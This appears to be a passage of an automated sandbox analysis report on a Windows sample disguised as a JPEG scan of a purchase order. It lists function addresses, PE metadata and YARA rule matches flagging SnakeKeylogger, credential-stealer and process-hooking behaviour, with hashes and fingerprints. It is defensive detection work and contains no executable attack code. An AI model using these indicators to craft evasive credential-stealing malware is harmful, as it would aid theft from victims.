                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C68A70_2_0C1C68A7
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_012271186_2_01227118
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122C1466_2_0122C146
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122A0886_2_0122A088
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_012253706_2_01225370
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122D2786_2_0122D278
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122C4686_2_0122C468
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122C7386_2_0122C738
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_012269A06_2_012269A0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122E9886_2_0122E988
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122CA086_2_0122CA08
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122CCD86_2_0122CCD8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122CFAA6_2_0122CFAA
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_01223E096_2_01223E09
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122F9616_2_0122F961
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0122E97A6_2_0122E97A
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_012239EE6_2_012239EE
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_012229EC6_2_012229EC
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_01223AA16_2_01223AA1
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06911E806_2_06911E80
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_069117A06_2_069117A0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06919C186_2_06919C18
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691FC686_2_0691FC68
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06910B306_2_06910B30
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_069193286_2_06919328
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_069150286_2_06915028
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_069129686_2_06912968
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691E6B06_2_0691E6B0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691E6A06_2_0691E6A0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691DE006_2_0691DE00
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06911E706_2_06911E70
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691178F6_2_0691178F
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691EF516_2_0691EF51
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691EF606_2_0691EF60
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691CCA06_2_0691CCA0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691DDFF6_2_0691DDFF
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691D5506_2_0691D550
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691D5406_2_0691D540
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_069195486_2_06919548
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691EAF86_2_0691EAF8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691E2586_2_0691E258
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691E24B6_2_0691E24B
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691F3B86_2_0691F3B8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06918BA06_2_06918BA0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691EB086_2_0691EB08
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06910B206_2_06910B20
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691D0F86_2_0691D0F8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691D0E96_2_0691D0E9
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691F8106_2_0691F810
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_069150186_2_06915018
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691F8036_2_0691F803
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_069100066_2_06910006
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_069100406_2_06910040
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691D9996_2_0691D999
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_0691D9A86_2_0691D9A8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_052132E08_2_052132E0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_052132D08_2_052132D0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_052108D48_2_052108D4
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085A18D88_2_085A18D8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085A49008_2_085A4900
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AB99C8_2_085AB99C
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085A20408_2_085A2040
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085A72E08_2_085A72E0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085A85B18_2_085A85B1
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AD5A08_2_085AD5A0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AD8308_2_085AD830
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AD8218_2_085AD821
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AAAF88_2_085AAAF8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AA1F38_2_085AA1F3
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AA2008_2_085AA200
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AB3988_2_085AB398
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AB3A88_2_085AB3A8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AD5918_2_085AD591
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AA6388_2_085AA638
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029ED27811_2_029ED278
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E537011_2_029E5370
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EA08811_2_029EA088
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EC14611_2_029EC146
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EC73811_2_029EC738
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EC46811_2_029EC468
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029ECA0811_2_029ECA08
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EE98811_2_029EE988
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E69A011_2_029E69A0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E3E0911_2_029E3E09
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029ECFAB11_2_029ECFAB
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E6FC811_2_029E6FC8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029ECCD811_2_029ECCD8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E29E011_2_029E29E0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EE97B11_2_029EE97B
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EF96111_2_029EF961
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06961E8011_2_06961E80
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_069617A011_2_069617A0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06969C1811_2_06969C18
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696FC6811_2_0696FC68
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06968BA011_2_06968BA0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06960B3011_2_06960B30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696932811_2_06969328
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696502811_2_06965028
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696296811_2_06962968
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696E6B011_2_0696E6B0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696E6A011_2_0696E6A0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696DE0011_2_0696DE00
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06961E7011_2_06961E70
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696178F11_2_0696178F
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696EF5111_2_0696EF51
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696EF6011_2_0696EF60
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696CCA011_2_0696CCA0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696DDFE11_2_0696DDFE
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D55011_2_0696D550
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D54011_2_0696D540
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696954811_2_06969548
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696EAF811_2_0696EAF8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696E25811_2_0696E258
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696E24911_2_0696E249
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696F3B811_2_0696F3B8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696EB0811_2_0696EB08
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06960B2011_2_06960B20
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D0F811_2_0696D0F8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D0E911_2_0696D0E9
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696F81011_2_0696F810
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696501811_2_06965018
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696000611_2_06960006
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696F80111_2_0696F801
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696004011_2_06960040
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D99911_2_0696D999
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D9A811_2_0696D9A8
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: invalid certificate
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1740591125.000000000C120000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1732669565.0000000003490000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1731934591.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4128482738.0000000000444000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129273715.0000000000D37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeBinary or memory string: OriginalFilenameOzOE.exe> vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 6.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
